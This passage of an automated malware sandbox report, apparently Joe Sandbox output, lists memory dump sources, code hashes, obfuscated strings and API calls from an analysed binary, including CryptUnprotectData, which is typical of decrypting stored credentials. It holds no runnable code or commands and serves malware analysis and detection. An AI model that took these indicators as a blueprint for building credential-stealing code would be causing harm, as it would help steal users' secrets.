                            • Associated: 00000000.00000002.1800603025.0000000000A19000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_380000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                            • String ID:
                            • API String ID: 3317088062-0
                            • Opcode ID: 89501a6fe3dcf545b4c65dae5128088ead61aceac9a78bd9397fd9336add23bd
                            • Instruction ID: 24ebf55b201d9c54e250cf6f79f54dca383ea3183c293e86d384924b73eb982f
                            • Opcode Fuzzy Hash: 89501a6fe3dcf545b4c65dae5128088ead61aceac9a78bd9397fd9336add23bd
                            • Instruction Fuzzy Hash: EF118EB1D45618EFEB208B54DC49FA9BB78FB04721F10439AE91A932C0C7745E44CF51
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1800322327.00000000005DE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                            • Associated: 00000000.00000002.1800196481.0000000000380000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.0000000000381000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.0000000000431000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.000000000043D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.0000000000462000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.00000000005CA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.0000000000767000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.0000000000841000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.0000000000865000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.000000000086D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.000000000087B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800505145.000000000087C000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800591244.0000000000A18000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800603025.0000000000A19000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_380000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: ,L{U$Y)k|$qYro
                            • API String ID: 0-2192058398
                            • Opcode ID: 6f2a97e6c9e63a0affcb144632d00c63d4d6aae52cd6e300b87505ead57b9aad
                            • Instruction ID: 58f2448aab3378d3f40e36269a76d5b1e9c531684e6ba45bfdd27d91c803eb4f
                            • Opcode Fuzzy Hash: 6f2a97e6c9e63a0affcb144632d00c63d4d6aae52cd6e300b87505ead57b9aad
                            • Instruction Fuzzy Hash: 1FB217F360C2049FE308BE2DEC8567ABBE5EB94720F16493DE6C4C3744EA3598058697
                            APIs
                            • CoCreateInstance.COMBASE(0039E118,00000000,00000001,0039E108,00000000), ref: 00393758
                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 003937B0
                            Memory Dump Source
                            • Source File: 00000000.00000002.1800208993.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                            • Associated: 00000000.00000002.1800196481.0000000000380000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.0000000000431000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.000000000043D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.0000000000462000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.00000000005CA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.00000000005DE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.0000000000767000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.0000000000841000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.0000000000865000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.000000000086D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.000000000087B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800505145.000000000087C000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800591244.0000000000A18000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800603025.0000000000A19000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_380000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: ByteCharCreateInstanceMultiWide
                            • String ID:
                            • API String ID: 123533781-0
                            • Opcode ID: d4348127cc47563869fe6cf71ad2f40016a7bd3c94fb5c082f79461778444da6
                            • Instruction ID: e9723b560ee478019b359f7695e6412e3af28f0376ee3451d56600f8b2bc00e5
                            • Opcode Fuzzy Hash: d4348127cc47563869fe6cf71ad2f40016a7bd3c94fb5c082f79461778444da6
                            • Instruction Fuzzy Hash: E541E770A40A28AFDB24DB58CC95F9BB7B5BB48702F5041D8E609EB290D7716E85CF50
                            APIs
                            • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00389B84
                            • LocalAlloc.KERNEL32(00000040,00000000), ref: 00389BA3
                            • LocalFree.KERNEL32(?), ref: 00389BD3
                            Memory Dump Source
                            • Source File: 00000000.00000002.1800208993.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                            • Associated: 00000000.00000002.1800196481.0000000000380000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.0000000000431000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.000000000043D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.0000000000462000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.00000000005CA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.00000000005DE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.0000000000767000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.0000000000841000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.0000000000865000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.000000000086D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.000000000087B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800505145.000000000087C000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800591244.0000000000A18000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800603025.0000000000A19000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_380000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Local$AllocCryptDataFreeUnprotect
                            • String ID:
                            • API String ID: 2068576380-0
                            • Opcode ID: d42320f5b3b8ea34cd81f7dc40a2430082c964841cf9bb4fa90a02a2474113c0
                            • Instruction ID: 94be1979b62294aaa9137796579907972a170ca3106d6c5cfcd5ea42f27a58e8
                            • Opcode Fuzzy Hash: d42320f5b3b8ea34cd81f7dc40a2430082c964841cf9bb4fa90a02a2474113c0
                            • Instruction Fuzzy Hash: D211F7B8A00209EFDB05DF94D985EAEB7B5FF88304F104599E815A7350D770AE14CFA1
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1800322327.00000000005DE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                            • Associated: 00000000.00000002.1800196481.0000000000380000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.0000000000381000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.0000000000431000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.000000000043D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.0000000000462000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.00000000005CA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.0000000000767000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.0000000000841000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.0000000000865000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.000000000086D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.000000000087B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800505145.000000000087C000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800591244.0000000000A18000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800603025.0000000000A19000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_380000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: /7w$]l^?
                            • API String ID: 0-2544237452
                            • Opcode ID: 3b10e71b6bbc49d2a509ce982c4166ba0be7c02b44248926698c4af61e5e28cf
                            • Instruction ID: da53b9a3f55b3252271ea464211f27eb1f764426b5dbaab979e60a3e6acf00a7
                            • Opcode Fuzzy Hash: 3b10e71b6bbc49d2a509ce982c4166ba0be7c02b44248926698c4af61e5e28cf
                            • Instruction Fuzzy Hash: AAB21AF3A0C2049FE304AE29DC8567AFBE9EF94720F16893DE6C5C3744E63598058697
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1800322327.00000000005DE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                            • Associated: 00000000.00000002.1800196481.0000000000380000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.0000000000381000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.0000000000431000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.000000000043D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.0000000000462000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.00000000005CA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.0000000000767000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.0000000000841000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.0000000000865000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.000000000086D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.000000000087B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800505145.000000000087C000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800591244.0000000000A18000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800603025.0000000000A19000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_380000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: A,{9$^2-<
                            • API String ID: 0-2065318020
                            • Opcode ID: ed2babb759d452c3ba873a5829e8aae3f2328c2373a3babfe5179d69bff79a2d
                            • Instruction ID: e8619c73af039aee587fb8180bd9fbb6edca4c3549cd0c28b722e4cdc36429fa
                            • Opcode Fuzzy Hash: ed2babb759d452c3ba873a5829e8aae3f2328c2373a3babfe5179d69bff79a2d
                            • Instruction Fuzzy Hash: 5CB2E3F360C2009FE304AE29EC8567AFBE9EF94720F16893DEAC5C7744E63558058796
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1800322327.00000000005DE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                            • Associated: 00000000.00000002.1800196481.0000000000380000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.0000000000381000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.0000000000431000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.000000000043D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.0000000000462000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.00000000005CA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.0000000000767000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.0000000000841000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.0000000000865000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.000000000086D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.000000000087B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800505145.000000000087C000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800591244.0000000000A18000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800603025.0000000000A19000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_380000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: E|${ev
                            • API String ID: 0-407735908
                            • Opcode ID: 6336fd2d88fce9929ff64282b75dbe3a9f2c079078a0655b1bae502ee54a5b47
                            • Instruction ID: 538bb1685a0261f75bd2d841587106c45fdaf54e7317e3eecf5c236fe34b5bc8
                            • Opcode Fuzzy Hash: 6336fd2d88fce9929ff64282b75dbe3a9f2c079078a0655b1bae502ee54a5b47
                            • Instruction Fuzzy Hash: C0D1CFB260C6049FE304AE2AEC8567AF7E5EF98320F16893DE6C487704EA7558418B57
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1800322327.00000000005DE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                            • Associated: 00000000.00000002.1800196481.0000000000380000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.0000000000381000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.0000000000431000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.000000000043D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.0000000000462000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.00000000005CA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.0000000000767000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.0000000000841000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.0000000000865000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.000000000086D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.000000000087B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800505145.000000000087C000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800591244.0000000000A18000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800603025.0000000000A19000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_380000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: (?UJ$As>
                            • API String ID: 0-1445874830
                            • Opcode ID: 78736c65eaa937c82f71ffbc4bf966e90b45ccb1d57ed541c75c7a26abdbe9f2
                            • Instruction ID: e28b59a504e723bfa414a5d9163e3871420c457851031fb8fb555cd5af69ff80
                            • Opcode Fuzzy Hash: 78736c65eaa937c82f71ffbc4bf966e90b45ccb1d57ed541c75c7a26abdbe9f2
                            • Instruction Fuzzy Hash: 2E6147F3A08204AFE344AE3DED5577AB7E5EF90310F1A892DE5C5C3744EA3598048786
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1800322327.00000000005DE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                            • Associated: 00000000.00000002.1800196481.0000000000380000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.0000000000381000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.0000000000431000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.000000000043D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.0000000000462000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.00000000005CA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.0000000000767000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.0000000000841000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.0000000000865000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.000000000086D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.000000000087B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800505145.000000000087C000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800591244.0000000000A18000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800603025.0000000000A19000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_380000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: V
                            • API String ID: 0-1342839628
                            • Opcode ID: 4ccb84c4e49ec78705c905737ebb6da9d9e0eeb79040fe1712357612e33bdd67
                            • Instruction ID: 2e8c5e61306404c9b4318b4e77ac1dfda4c34cd556bfc25dc2de6222732ef782
                            • Opcode Fuzzy Hash: 4ccb84c4e49ec78705c905737ebb6da9d9e0eeb79040fe1712357612e33bdd67
                            • Instruction Fuzzy Hash: 5D4106B240C3599FD7099F19D9446BE7FE8FF51320F20882EE9C282A45E6364D14EB5A
                            Memory Dump Source
                            • Source File: 00000000.00000002.1800322327.00000000005DE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                            • Associated: 00000000.00000002.1800196481.0000000000380000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.0000000000381000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.0000000000431000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.000000000043D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.0000000000462000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.00000000005CA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.0000000000767000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.0000000000841000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.0000000000865000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.000000000086D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.000000000087B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800505145.000000000087C000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800591244.0000000000A18000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800603025.0000000000A19000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_380000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: c4402c2247bc3316b39991198b1e9e8d6a5116b275b891d0bf480f801f1f50d8
                            • Instruction ID: 7d5f26b146208982ba5ced610bba18fbbde16f0dde34bbe60be50a00ccb513c6
                            • Opcode Fuzzy Hash: c4402c2247bc3316b39991198b1e9e8d6a5116b275b891d0bf480f801f1f50d8
                            • Instruction Fuzzy Hash: 7551F5B3E081104FE3186928DC547BAB7DAEBD4321F2B463EEA88D3BC4D9395C014696
                            Memory Dump Source
                            • Source File: 00000000.00000002.1800322327.00000000005DE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                            • Associated: 00000000.00000002.1800196481.0000000000380000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.0000000000381000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.0000000000431000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.000000000043D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.0000000000462000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.00000000005CA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.0000000000767000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.0000000000841000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.0000000000865000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.000000000086D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.000000000087B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800505145.000000000087C000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800591244.0000000000A18000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800603025.0000000000A19000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_380000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: dc2939c0d5abdf8046fae098503841059c8e938f84c25bd64a0bc4a1b29ba67f
                            • Instruction ID: 58f42d40b886c1004f1b49e820b25346275594027341bace4ded956c918afe2f
                            • Opcode Fuzzy Hash: dc2939c0d5abdf8046fae098503841059c8e938f84c25bd64a0bc4a1b29ba67f
                            • Instruction Fuzzy Hash: 335157F3E086105FF3049E28EC8177AB7D5DBD0720F1A853EEA89A3784E5785C058292
                            Memory Dump Source
                            • Source File: 00000000.00000002.1800322327.00000000005DE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                            • Associated: 00000000.00000002.1800196481.0000000000380000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.0000000000381000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.0000000000431000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.000000000043D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.0000000000462000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.00000000005CA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.0000000000767000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.0000000000841000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.0000000000865000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.000000000086D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.000000000087B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800505145.000000000087C000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800591244.0000000000A18000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800603025.0000000000A19000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_380000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: baca68dac8c34ada0da8c4935e2fea72d3e79bb4897dd50f7bfb31e187160030
                            • Instruction ID: 8da1238256ad5eef78e3bbd1be1e5041deaf828a7e05c9237894f90739a9dfab
                            • Opcode Fuzzy Hash: baca68dac8c34ada0da8c4935e2fea72d3e79bb4897dd50f7bfb31e187160030
                            • Instruction Fuzzy Hash: D9512CF3B082049BE304AA39DC8476BBBD7EBE4310F2A863DD7C487798F93954058646
                            Memory Dump Source
                            • Source File: 00000000.00000002.1800322327.00000000005DE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                            • Associated: 00000000.00000002.1800196481.0000000000380000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.0000000000381000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.0000000000431000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.000000000043D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.0000000000462000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.00000000005CA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.0000000000767000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.0000000000841000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.0000000000865000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.000000000086D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.000000000087B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800505145.000000000087C000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800591244.0000000000A18000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800603025.0000000000A19000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_380000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 44d327ec47a06b9a08621f7d4e2e6c58e9f3d4630ca117155e354547a1d39c5c
                            • Instruction ID: 62d377606b3f50b337ea0a6ff3038b22f91e4a22527284105bfca6f7a52f0719
                            • Opcode Fuzzy Hash: 44d327ec47a06b9a08621f7d4e2e6c58e9f3d4630ca117155e354547a1d39c5c
                            • Instruction Fuzzy Hash: 993114F3E582049BF7185929DC857BAB697DBD0320F2F823D9B88437C8E97D080A4295
                            Memory Dump Source
                            • Source File: 00000000.00000002.1800208993.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                            • Associated: 00000000.00000002.1800196481.0000000000380000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.0000000000431000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.000000000043D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.0000000000462000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.00000000005CA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.00000000005DE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.0000000000767000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.0000000000841000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.0000000000865000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.000000000086D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.000000000087B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800505145.000000000087C000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800591244.0000000000A18000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800603025.0000000000A19000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_380000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                            • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                            • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                            • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                            APIs
